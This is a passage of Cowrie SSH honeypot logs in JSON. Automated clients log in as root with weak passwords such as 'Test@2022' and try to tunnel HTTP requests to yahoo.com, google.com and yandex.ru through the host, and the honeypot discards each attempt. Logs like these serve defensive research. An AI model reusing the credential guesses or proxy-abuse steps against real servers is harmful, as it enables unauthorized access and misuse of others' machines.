mac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:06:24.201380Z","src_ip":"213.209.150.239","session":"b298bcbd68ec"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:06:24.482814Z","src_ip":"213.209.150.239","session":"b298bcbd68ec"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":5838,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:5838","sensor":"my-vps","timestamp":"2025-08-26T01:06:24.540799Z","session":"b298bcbd68ec"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:24.597494Z","src_ip":"213.209.150.239","session":"b298bcbd68ec"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":11849,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:11849","sensor":"my-vps","timestamp":"2025-08-26T01:06:24.750823Z","session":"b298bcbd68ec"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:24.807605Z","src_ip":"213.209.150.239","session":"b298bcbd68ec"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:06:24.864620Z","src_ip":"213.209.150.239","session":"b298bcbd68ec"}
{"eventid":"cowrie.session.connect","src_ip":"185.246.128.133","src_port":6961,"dst_ip":"1.2.3.4","dst_port":22,"session":"124af492698f","protocol":"ssh","message":"New connection: 185.246.128.133:6961 (1.2.3.4:22) [session: 124af492698f]","sensor":"my-vps","timestamp":"2025-08-26T01:06:24.899251Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_5.3","message":"Remote SSH version: SSH-2.0-OpenSSH_5.3","sensor":"my-vps","timestamp":"2025-08-26T01:06:24.900107Z","src_ip":"185.246.128.133","session":"124af492698f"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":41682,"dst_ip":"1.2.3.4","dst_port":22,"session":"9abb8c1406e2","protocol":"ssh","message":"New connection: 213.209.150.239:41682 (1.2.3.4:22) [session: 9abb8c1406e2]","sensor":"my-vps","timestamp":"2025-08-26T01:06:24.920257Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:06:24.921042Z","src_ip":"213.209.150.239","session":"9abb8c1406e2"}
{"eventid":"cowrie.client.kex","hassh":"a7a87fbe86774c2e40cc4a7ea2ab1b3c","hasshAlgorithms":"diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: a7a87fbe86774c2e40cc4a7ea2ab1b3c","sensor":"my-vps","timestamp":"2025-08-26T01:06:24.944516Z","src_ip":"185.246.128.133","session":"124af492698f"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:06:24.977487Z","src_ip":"213.209.150.239","session":"9abb8c1406e2"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:06:25.772856Z","src_ip":"213.209.150.239","session":"9abb8c1406e2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":13541,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:13541","sensor":"my-vps","timestamp":"2025-08-26T01:06:25.830446Z","session":"9abb8c1406e2"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:06:25.848969Z","src_ip":"185.246.128.133","session":"124af492698f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:25.887161Z","src_ip":"213.209.150.239","session":"9abb8c1406e2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"142.250.74.78","dst_port":80,"src_ip":"185.246.128.133","src_port":11443,"message":"direct-tcp connection request to 142.250.74.78:80 from 127.0.0.1:11443","sensor":"my-vps","timestamp":"2025-08-26T01:06:25.894962Z","session":"124af492698f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"142.250.74.78","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 142.250.74.78:80 with data b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:25.939865Z","src_ip":"185.246.128.133","session":"124af492698f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":25226,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:25226","sensor":"my-vps","timestamp":"2025-08-26T01:06:26.043180Z","session":"9abb8c1406e2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2a00:1450:400f:802::200e","dst_port":80,"src_ip":"185.246.128.133","src_port":22818,"message":"direct-tcp connection request to 2a00:1450:400f:802::200e:80 from 127.0.0.1:22818","sensor":"my-vps","timestamp":"2025-08-26T01:06:26.071064Z","session":"124af492698f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:26.099727Z","src_ip":"213.209.150.239","session":"9abb8c1406e2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2a00:1450:400f:802::200e","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2a00:1450:400f:802::200e:80 with data b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:26.115832Z","src_ip":"185.246.128.133","session":"124af492698f"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:06:26.157360Z","src_ip":"213.209.150.239","session":"9abb8c1406e2"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":41776,"dst_ip":"1.2.3.4","dst_port":22,"session":"525b64197e25","protocol":"ssh","message":"New connection: 213.209.150.239:41776 (1.2.3.4:22) [session: 525b64197e25]","sensor":"my-vps","timestamp":"2025-08-26T01:06:26.203477Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:06:26.204340Z","src_ip":"213.209.150.239","session":"525b64197e25"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"185.246.128.133","src_port":9713,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:9713","sensor":"my-vps","timestamp":"2025-08-26T01:06:26.246993Z","session":"124af492698f"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:06:26.251173Z","src_ip":"213.209.150.239","session":"525b64197e25"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:26.292017Z","src_ip":"185.246.128.133","session":"124af492698f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2a00:1450:400f:802::200e","dst_port":80,"src_ip":"185.246.128.133","src_port":31662,"message":"direct-tcp connection request to 2a00:1450:400f:802::200e:80 from 127.0.0.1:31662","sensor":"my-vps","timestamp":"2025-08-26T01:06:26.423043Z","session":"124af492698f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2a00:1450:400f:802::200e","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":3,"message":"discarded direct-tcp forward request 3 to 2a00:1450:400f:802::200e:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:26.467701Z","src_ip":"185.246.128.133","session":"124af492698f"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:06:26.484944Z","src_ip":"213.209.150.239","session":"525b64197e25"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":18686,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:18686","sensor":"my-vps","timestamp":"2025-08-26T01:06:26.532988Z","session":"525b64197e25"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:26.580241Z","src_ip":"213.209.150.239","session":"525b64197e25"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"185.246.128.133","src_port":10288,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:10288","sensor":"my-vps","timestamp":"2025-08-26T01:06:26.598856Z","session":"124af492698f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","id":4,"message":"discarded direct-tcp forward request 4 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:26.643433Z","src_ip":"185.246.128.133","session":"124af492698f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":6306,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:6306","sensor":"my-vps","timestamp":"2025-08-26T01:06:26.717345Z","session":"525b64197e25"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:26.764416Z","src_ip":"213.209.150.239","session":"525b64197e25"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"185.246.128.133","src_port":11990,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:11990","sensor":"my-vps","timestamp":"2025-08-26T01:06:26.774623Z","session":"124af492698f"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:06:26.812136Z","src_ip":"213.209.150.239","session":"525b64197e25"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","id":5,"message":"discarded direct-tcp forward request 5 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:26.819051Z","src_ip":"185.246.128.133","session":"124af492698f"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:06:26.864241Z","src_ip":"185.246.128.133","session":"124af492698f"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":41820,"dst_ip":"1.2.3.4","dst_port":22,"session":"a87a3d50d86e","protocol":"ssh","message":"New connection: 213.209.150.239:41820 (1.2.3.4:22) [session: a87a3d50d86e]","sensor":"my-vps","timestamp":"2025-08-26T01:06:26.867671Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:06:26.868441Z","src_ip":"213.209.150.239","session":"a87a3d50d86e"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:06:26.924983Z","src_ip":"213.209.150.239","session":"a87a3d50d86e"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:06:27.208098Z","src_ip":"213.209.150.239","session":"a87a3d50d86e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":14271,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:14271","sensor":"my-vps","timestamp":"2025-08-26T01:06:27.265574Z","session":"a87a3d50d86e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:27.322383Z","src_ip":"213.209.150.239","session":"a87a3d50d86e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":10635,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:10635","sensor":"my-vps","timestamp":"2025-08-26T01:06:27.479018Z","session":"a87a3d50d86e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:06:27.535713Z","src_ip":"213.209.150.239","session":"a87a3d50d86e"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:06:27.593184Z","src_ip":"213.209.150.239","session":"a87a3d50d86e"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":41892,"dst_ip":"1.2.3.4","dst_port":22,"session":"c7e21e8637bb","protocol":"ssh","message":"New connection: 213.209.150.239:41892 (1.2.3.4:22) [session: c7e21e8637bb]","sensor":"my-vps","timestamp":"2025-08-26T01:06:27.639573Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:06:27.640344Z","src_ip":"213.209.150.239","session":"c7e21e8637bb"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:06:27.687476Z","src_ip":"213.209.150.239","session":"c7e21e8637bb"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:06:27.922253Z","src_ip":"213.209.150.239","session":"c7e21e8637bb"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":27155,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:27155","sensor":"my-vps","timestamp":"2025-08-26T01:06:27.970306Z","session":"c7e21e8637bb"}
